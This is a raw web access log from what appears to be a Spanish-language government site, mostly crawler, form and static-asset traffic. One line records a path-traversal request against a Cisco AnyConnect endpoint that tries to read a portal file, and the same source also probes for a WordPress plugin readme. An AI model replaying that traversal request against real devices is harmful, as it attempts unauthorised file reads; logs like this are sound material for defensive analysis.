201.245.192.253 - - [28/Feb/2024:01:18:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
106.105.237.36 - - [28/Feb/2024:01:18:12 -0500] "GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1" 404 1035
172.22.2.4 - - [28/Feb/2024:01:16:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.19 - - [28/Feb/2024:01:18:57 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202020/1388.pdf HTTP/1.1" 304 -
190.84.43.161 - - [28/Feb/2024:01:19:26 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5514
172.22.2.4 - - [28/Feb/2024:01:17:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
66.249.66.19 - - [28/Feb/2024:01:19:48 -0500] "GET /BLA/resoluciones/AUTOS%202008/0393.pdf HTTP/1.1" 200 80304
201.245.192.253 - - [28/Feb/2024:01:19:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39615
201.245.192.253 - - [28/Feb/2024:01:19:49 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33394
201.245.192.253 - - [28/Feb/2024:01:19:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:01:19:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39625
201.245.192.253 - - [28/Feb/2024:01:20:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
106.105.237.36 - - [28/Feb/2024:01:20:45 -0500] "GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 404 1034
201.245.192.253 - - [28/Feb/2024:01:20:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33394
201.245.192.253 - - [28/Feb/2024:01:21:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:01:21:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
216.245.221.92 - - [28/Feb/2024:01:22:00 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:01:22:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
27.115.124.70 - - [28/Feb/2024:01:23:14 -0500] "GET /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 302 -
27.115.124.70 - - [28/Feb/2024:01:23:14 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12408
27.115.124.109 - - [28/Feb/2024:01:23:15 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
27.115.124.70 - - [28/Feb/2024:01:23:15 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
27.115.124.45 - - [28/Feb/2024:01:23:15 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
27.115.124.70 - - [28/Feb/2024:01:23:15 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
27.115.124.45 - - [28/Feb/2024:01:23:15 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
27.115.124.38 - - [28/Feb/2024:01:23:15 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
27.115.124.118 - - [28/Feb/2024:01:23:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
27.115.124.45 - - [28/Feb/2024:01:23:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
27.115.124.109 - - [28/Feb/2024:01:23:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
27.115.124.70 - - [28/Feb/2024:01:23:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
27.115.124.70 - - [28/Feb/2024:01:23:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
27.115.124.118 - - [28/Feb/2024:01:23:19 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
27.115.124.101 - - [28/Feb/2024:01:23:19 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
27.115.124.38 - - [28/Feb/2024:01:23:19 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
27.115.124.38 - - [28/Feb/2024:01:23:21 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
27.115.124.38 - - [28/Feb/2024:01:23:21 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 12202
201.245.192.253 - - [28/Feb/2024:01:23:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
